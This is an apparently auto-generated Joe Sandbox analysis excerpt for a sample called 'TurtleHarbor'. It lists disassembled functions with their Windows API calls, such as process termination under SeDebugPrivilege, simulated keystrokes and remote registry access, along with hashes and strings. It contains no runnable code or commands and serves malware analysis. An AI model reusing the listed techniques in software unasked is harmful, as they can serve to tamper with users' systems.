Part of subcall function 00374BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373B8A,?), ref: 00374BE0

Part of subcall function 00374BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373B8A,?), ref: 00374BF9

Part of subcall function 00374FEC: GetFileAttributesW.KERNEL32(?,00373BFE), ref: 00374FED

lstrcmpiW.KERNEL32(?,?), ref: 003752FB
_wcscmp.LIBCMT ref: 00375315
MoveFileW.KERNEL32(?,?), ref: 00375330

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: ef0c6920c9beca78b6537c2ab21731cc41f1a8d9a811d93334723365d0279c15
Instruction ID: 5654fdfa42898ad7e439165dc034692a6d9111da0f8921ea7bb50268ae416706
Opcode Fuzzy Hash: ef0c6920c9beca78b6537c2ab21731cc41f1a8d9a811d93334723365d0279c15
Instruction Fuzzy Hash: BE5184B20087949BC776EBA4D8819DFB3ECAF84300F50491EF689D7152EF74A688C756

Function 00398C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00398D24

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: edc1fc433324ce0354c3d3fad8a27695d83356bf16acce15ab0762ab17cc9b71
Instruction ID: d84bf795c5e6316f0ffb4a34d7bb09c2d1ff3c075f2b5d85f4702949c317ed33
Opcode Fuzzy Hash: edc1fc433324ce0354c3d3fad8a27695d83356bf16acce15ab0762ab17cc9b71
Instruction Fuzzy Hash: 1251B130A41204BFEF27AF28CC89B997B68FB87310F254516F915EB5E1CF71A990DA50

Function 00312F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0034C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0034C65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0034C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0034C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0034C6B1
DestroyIcon.USER32(00000000), ref: 0034C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0034C6DD
DestroyIcon.USER32(?), ref: 0034C6EC

Part of subcall function 0039AAD4: DeleteObject.GDI32(00000000), ref: 0039AB0D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 534fe60d0186ff5a8b04846a63ee278d89c87706b43bbd3e8d0f15386ae16162
Instruction ID: 018a789e4ffbb3513ca9857413f0add8e9308046dc90d254c9feee27398aaba2
Opcode Fuzzy Hash: 534fe60d0186ff5a8b04846a63ee278d89c87706b43bbd3e8d0f15386ae16162
Instruction Fuzzy Hash: 33519B70610209AFDB2ADF24DC45FAA77F9FB48710F114519F9429B2A0DB71ECA1DB50

Function 0036A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0036B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0036B54D
Part of subcall function 0036B52D: GetCurrentThreadId.KERNEL32 ref: 0036B554
Part of subcall function 0036B52D: AttachThreadInput.USER32(00000000,?,0036A23B,?,00000001), ref: 0036B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 0036A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0036A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0036A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 0036A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0036A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0036A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 0036A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0036A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0036A2B3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 4c206a677ebd34176d9a12b934b882419ab48cae289881c4e4170a725cb51e63
Instruction ID: 81f54ea91c6d86de019d9007aa3dbe11b9cbae949b9b74c32643fafcab899c8d
Opcode Fuzzy Hash: 4c206a677ebd34176d9a12b934b882419ab48cae289881c4e4170a725cb51e63
Instruction Fuzzy Hash: 3F1104B1950618BEF6116F609C8AFAA7F2DEF4E795F104419F340AB0E0CAF35C509EA4

Function 003694D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0036915A,00000B00,?,?), ref: 003694E2
HeapAlloc.KERNEL32(00000000,?,0036915A,00000B00,?,?), ref: 003694E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0036915A,00000B00,?,?), ref: 003694FE
GetCurrentProcess.KERNEL32(?,00000000,?,0036915A,00000B00,?,?), ref: 00369506
DuplicateHandle.KERNEL32(00000000,?,0036915A,00000B00,?,?), ref: 00369509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0036915A,00000B00,?,?), ref: 00369519
GetCurrentProcess.KERNEL32(0036915A,00000000,?,0036915A,00000B00,?,?), ref: 00369521
DuplicateHandle.KERNEL32(00000000,?,0036915A,00000B00,?,?), ref: 00369524
CreateThread.KERNEL32(00000000,00000000,0036954A,00000000,00000000,00000000), ref: 0036953E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: bb936b0694da9b91266bace606d6f81b3bb421fa02d814c794b0f1c0025d2d78
Instruction ID: ca895a97fafcbd750e893667d47cc05d155310feedd8c1ce7152afa312b938c2
Opcode Fuzzy Hash: bb936b0694da9b91266bace606d6f81b3bb421fa02d814c794b0f1c0025d2d78
Instruction Fuzzy Hash: 1301CDB5240304BFE711AFA5DC4DFAB7BACEB8A711F008411FA05DB1A1DA749800CB30

Function 0038A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0038A265
NULL Pointer assignment, xrefs: 0038A28E, 0038A5B2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 8135043a271502d784f17a8e8a3c8f4e89cc645c92ca4e1a95124a6ad17d2215
Instruction ID: c168d24d454bc5aa0b8d99405766d61754367a3f7b0927c0ebdd408e3d0e9b72
Opcode Fuzzy Hash: 8135043a271502d784f17a8e8a3c8f4e89cc645c92ca4e1a95124a6ad17d2215
Instruction Fuzzy Hash: D3C1C571A007199FEF15EF98C884BAEB7F9FB48310F1584AAE945AB240E7B0DD44CB51

Function 003897FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00389851
VariantInit.OLEAUT32(?), ref: 00389922
VariantInit.OLEAUT32(?), ref: 00389A23
VariantClear.OLEAUT32(?), ref: 00389A2D
VariantClear.OLEAUT32(?), ref: 00389A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 003898B2, 003899E0, 00389A98
Incorrect Object type in FOR..IN loop, xrefs: 00389A06

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: dac3f69d1746ecbcd5b5934151ca5e6cedd23b340fa678c3612b64dc3fad0f42
Instruction ID: 35513a5813e1785eb0aae93490c67b752a22c413c920545e17497f9155ec34c3
Opcode Fuzzy Hash: dac3f69d1746ecbcd5b5934151ca5e6cedd23b340fa678c3612b64dc3fad0f42
Instruction Fuzzy Hash: 79919E70A00319ABDF26DFA5C884FAEBBB8EF45710F14859EF516AB240D7749944CFA0

Function 00389E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00367D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?,?,00368073), ref: 00367D45
Part of subcall function 00367D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?), ref: 00367D60
Part of subcall function 00367D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?), ref: 00367D6E
Part of subcall function 00367D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?), ref: 00367D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00389EF0
_memset.LIBCMT ref: 00389EFD
_memset.LIBCMT ref: 0038A040
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0038A06C
CoTaskMemFree.OLE32(?), ref: 0038A077

Strings

NULL Pointer assignment, xrefs: 0038A0C5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 466602b97b39b6887107afdd0748fedb49ab5ff6c6b6c737f26c2d2aa8dc8575
Instruction ID: 95f9cd2233c6d58259418efcc499440b18797722e2499d6195df69db768fd981
Opcode Fuzzy Hash: 466602b97b39b6887107afdd0748fedb49ab5ff6c6b6c737f26c2d2aa8dc8575
Instruction Fuzzy Hash: 13913A71D00229EBDB16EFA4D885EDEBBB9FF18310F10815AF519AB241DB715A44CFA0

Function 003973A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00397449
SendMessageW.USER32(?,00001036,00000000,?), ref: 0039745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00397477
_wcscat.LIBCMT ref: 003974D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 003974E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00397517

Strings

SysListView32, xrefs: 0039741B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 750813d40014b1e7ecf150e892e347ca92e1e8924103acb7f3b5a4915f2d67a8
Instruction ID: 2f979c39aab269edc0e722c2cd3fcf4d8e1ea6d269e0b5f8ab0b2b1c13b8bb2c
Opcode Fuzzy Hash: 750813d40014b1e7ecf150e892e347ca92e1e8924103acb7f3b5a4915f2d67a8
Instruction Fuzzy Hash: 46419371A14348AFEF229F64CC85BEE77A8EF08350F11442AF985A72D2D7719D84CB50

Function 0038F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00374148: CreateToolhelp32Snapshot.KERNEL32 ref: 0037416D
Part of subcall function 00374148: Process32FirstW.KERNEL32(00000000,?), ref: 0037417B
Part of subcall function 00374148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00374245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038F08D
GetLastError.KERNEL32 ref: 0038F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 0038F14C
GetLastError.KERNEL32(00000000), ref: 0038F157
CloseHandle.KERNEL32(00000000), ref: 0038F18C

Strings

SeDebugPrivilege, xrefs: 0038F0AB

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: b13e10d1f151d65e704f831f2c45aeba01111b8bff24a2b9481fb089fd6e0f19
Instruction ID: 3f9c014e3a0fc5497ac01afcb018316c55c9d900256ee7d1707110c9a75b2b09
Opcode Fuzzy Hash: b13e10d1f151d65e704f831f2c45aeba01111b8bff24a2b9481fb089fd6e0f19
Instruction Fuzzy Hash: 0641BC702003019FDB27EF24DC99FADB7A5AF85714F148069F8469F2D2CB74A844CB96

Function 003747E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00374802
LoadStringW.USER32(00000000), ref: 00374809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0037481F
LoadStringW.USER32(00000000), ref: 00374826
_wprintf.LIBCMT ref: 0037484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00374847

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: db8d7ae76cdee2d033a18a7300a488db6c55fbdf04982d80e6fb8c7b4526a200
Instruction ID: 5a778b5665db90fa8bd055500550556618822d6d98418881e82746855b79d2de
Opcode Fuzzy Hash: db8d7ae76cdee2d033a18a7300a488db6c55fbdf04982d80e6fb8c7b4526a200
Instruction Fuzzy Hash: E90162F694020C7FE7269BA09D89EF7776CE709300F404595B749E2051EB74AE844B75

Function 0039DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

GetSystemMetrics.USER32(0000000F), ref: 0039DB42
GetSystemMetrics.USER32(0000000F), ref: 0039DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0039DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0039DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0039DDDC
ShowWindow.USER32(00000003,00000000), ref: 0039DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 0039DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 0039DE43

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 24056367cbfe07f8b2dc77eb05b2bad966151b349e944467613f87bdadb265d5
Instruction ID: d048e41dabc3dd408baea27a73fda1999ed75af3a7c33014e2edbe53ad97c29e
Opcode Fuzzy Hash: 24056367cbfe07f8b2dc77eb05b2bad966151b349e944467613f87bdadb265d5
Instruction Fuzzy Hash: 7CB19931A00215EFDF1ACF69C9C67AE7BB1FF04701F098069ED48AE295D731A950CBA0

Function 00390371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039044E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 8992c998fa8f98f710a3298d8ae3426bf125ceb6b3a5e204db90e8d14f1dc055
Instruction ID: 9219ff466e5946aa8d5d7527982ed30a232221490d0b9a657f5989053ba9b9b8
Opcode Fuzzy Hash: 8992c998fa8f98f710a3298d8ae3426bf125ceb6b3a5e204db90e8d14f1dc055
Instruction Fuzzy Hash: 09A18B702042019FCB1AEF64D881B6EB7F5EF85314F14891DF9969B2A2DB31E985CF42

Function 00312E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000), ref: 00312E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000,000000FF), ref: 00312EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000), ref: 0034C55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000), ref: 0034C5C7

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: cfec5af409581446a593b34521f194d8740d975def31949d11acf10df3f49e2d
Instruction ID: 2b75ebb771969d5ca0f15b1dbe7f69e0b106364e30730ea6ed6eeaa820490fbc
Opcode Fuzzy Hash: cfec5af409581446a593b34521f194d8740d975def31949d11acf10df3f49e2d
Instruction Fuzzy Hash: DD41E9306156809ACB7F8B29DC887EB7BDAAB8A300F59444DF4474A960D771B9E0D730

Function 003967F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00396810
GetDC.USER32(00000000), ref: 00396818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00396823
ReleaseDC.USER32(00000000,00000000), ref: 0039682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0039686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0039687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0039964F,?,?,000000FF,00000000,?,000000FF,?), ref: 003968B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003968D6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 84efbba690ffc67e75b7dbe07c47460a726dc2d06fba9b0c14fb823d38a903e4
Instruction ID: 2000845ad6b2a890f63c31d788f5f612dd0ca94b21f74fceb6298e2a6127f4cd
Opcode Fuzzy Hash: 84efbba690ffc67e75b7dbe07c47460a726dc2d06fba9b0c14fb823d38a903e4
Instruction Fuzzy Hash: E6316B72101214BFEF168F10CC8AFEB3BADEB4A765F054065FE089A292D7759851CBB0

Function 0036C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0036C75D
_memcmp.LIBCMT ref: 0036C77F
_memcmp.LIBCMT ref: 0036C797
_memcmp.LIBCMT ref: 0036C7AA
_memcmp.LIBCMT ref: 0036C7C4
_memcmp.LIBCMT ref: 0036C7D7
_memcmp.LIBCMT ref: 0036C7EF
_memcmp.LIBCMT ref: 0036C80A

Memory Dump Source

